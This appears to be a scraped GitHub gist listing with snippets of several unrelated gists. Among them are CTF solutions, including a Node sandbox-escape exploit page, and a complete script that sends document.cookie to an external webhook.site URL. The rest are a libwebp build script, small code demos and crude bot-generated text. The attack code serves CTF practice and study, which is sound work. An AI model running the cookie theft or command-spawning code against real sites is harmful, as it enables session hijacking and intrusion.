
Stuart Larsen c0nrad

@c0nrad
c0nrad / solve.py
Created November 26, 2023 18:43
GlacierCTF 2023 rev/password-recovery
import angr
from IPython import embed
import logging
import claripy
logging.getLogger('angr').setLevel('WARN')
for i in range(11, 56):
print(i)
@c0nrad
c0nrad / exploit.html
Created September 25, 2023 13:29
web/optimized-admin-bot vsCTF 2023
<!DOCTYPE html>
<html>
<script>
let process = window._globalObject.constructor.constructor("return process")();
let spawn_sync = process.binding("spawn_sync");
normalizeSpawnArguments = function (c, b, a) {
if ((Array.isArray(b) ? (b = b.slice(0)) : ((a = b), (b = [])), a === undefined && (a = {}), (a = Object.assign({}, a)), a.shell)) {
const g = [c].concat(b).join(" ");
typeof a.shell === "string" ? (c = a.shell) : (c = "/bin/sh"), (b = ["-c", g]);
@c0nrad
c0nrad / script.js
Created October 26, 2022 13:29
script.js
// Builds a <video> element with a single <source> child and attaches it to the page.
// The source URL points at an external webhook.site endpoint and carries the
// URI-encoded value of document.cookie in its `data` query parameter, so when the
// browser requests the media resource, every cookie readable by script is disclosed
// to that host.
//
// Defensive notes: cookies set with the HttpOnly attribute do not appear in
// document.cookie, and a Content-Security-Policy with a restrictive media-src
// (or default-src) stops the outbound media request. Requests to unexpected hosts
// with cookie-shaped query strings are worth alerting on in proxy/egress logs.
var videoelement = document.createElement("video");
videoelement.setAttribute("id", "video1");
var sourceMP4 = document.createElement("source");
sourceMP4.type = "video/mp4";
// The ".png" path and "video/mp4" type are only labels; the cookie string in the
// query part is what leaves the page.
sourceMP4.src = "https://webhook.site/b0ac5293-b48e-4831-a5d6-eebedb5869bf/b.png?data=" + encodeURI(document.cookie);
videoelement.appendChild(sourceMP4);
document.body.appendChild(videoelement);
# Downloads the libwebp v1.1.0 source archive from GitHub into /tmp, unpacks it,
# configures it with cmake (SIMD, the cwebp/dwebp/gif2webp/img2webp/webpinfo tools
# and near-lossless enabled), then builds and installs it.
#
# NOTE(review): the archive is unpacked and built without any integrity check.
# Verify it against a digest obtained out of band before the tar step, e.g.
#   echo "<EXPECTED_SHA256>  /tmp/libwebp-v1.1.0.tar.gz" | sha256sum -c -
# (<EXPECTED_SHA256> is a placeholder, not a real value).
# NOTE(review): the version is pinned to 1.1.0; check upstream release notes and
# security advisories for fixes published after this release before installing an
# image decoder that will handle untrusted files.
# NOTE(review): all paths are fixed names under the shared /tmp directory. If this
# runs with elevated privileges (make install usually needs them), another local
# user could pre-create those paths; a private `mktemp -d` directory avoids that.
wget https://github.com/webmproject/libwebp/archive/v1.1.0.tar.gz -O /tmp/libwebp-v1.1.0.tar.gz
tar -C /tmp -zxvf /tmp/libwebp-v1.1.0.tar.gz
mkdir -p /tmp/libwebp-1.1.0/make
# NOTE(review): as written, the cmake line ends with a backslash, so `make` on the
# following line is passed to cmake as an extra argument instead of running as its
# own command. The cd also stops at the source root while cmake is given `../`,
# although a separate make/ directory was just created. This looks like it was meant
# to be `cd /tmp/libwebp-1.1.0/make && cmake ... ../ && make && make install`.
# Confirm against a working copy before relying on it.
cd /tmp/libwebp-1.1.0 && \
cmake -DWEBP_ENABLE_SIMD=ON -DWEBP_BUILD_CWEBP=ON -DWEBP_BUILD_DWEBP=ON -DWEBP_BUILD_GIF2WEBP=ON -DWEBP_BUILD_IMG2WEBP=ON -DWEBP_BUILD_WEBPINFO=ON -DWEBP_NEAR_LOSSLESS=ON ../ \
make && make install
$host = http.getHostHeader();
if ( $host == "coverity.10gen.com" || $host == "coverity.mongodb.com" ) {
http.changeSite( "https://coverity.corp.mongodb.com/" );
}
if ( $host == "coverity.corp.mongodb.com" ) {
if ( !ssl.isSSL() ) {
http.changeSite( "https://coverity.corp.mongodb.com/" );
}
package main
import (
"fmt"
"net/http"
"github.com/gorilla/websocket"
)
type Message struct {
class Lol:
    """Empty holder class; callables are attached to an instance at runtime."""


lol = Lol()
functions = ["print_hai", "print_bai", "print_meow", "print_lulz"]

for func in functions:
    # The part after the underscore is the word to print: hai, bai, meow, lulz.
    printValue = func.split('_')[-1]
    # Passing printValue as a default argument freezes the current word in each
    # lambda; a plain closure would see only the loop's final value.
    setattr(lol, func, lambda printValue=printValue: print(printValue))

# Attributes set on the instance are plain functions, so no self is passed.
lol.print_hai()
@c0nrad
c0nrad / gist:9901654612628b75cfc8
Created November 14, 2014 13:54
Sylvia Pickup Lines
I taught Sylvia pickup lines...
➜ love git:(master) ✗ ./love
I I apologize? Wanna fuck like peanut
butter, wanna go halves on a bastard?
Do I wanna go halves on a
killer...want to sleep with me? Your legs
must be skin and we'll talk about
the hair between your peaches, wanna shake
your left leg was ten.

Keybase proof

I hereby claim:

  • I am c0nrad on github.
  • I am c0nrad (https://keybase.io/c0nrad) on keybase.
  • I have a public key whose fingerprint is B158 1A57 70AF 7D55 B3A0 DF0E 1033 FE9E 3C78 F5F1

To claim this, I am signing this object: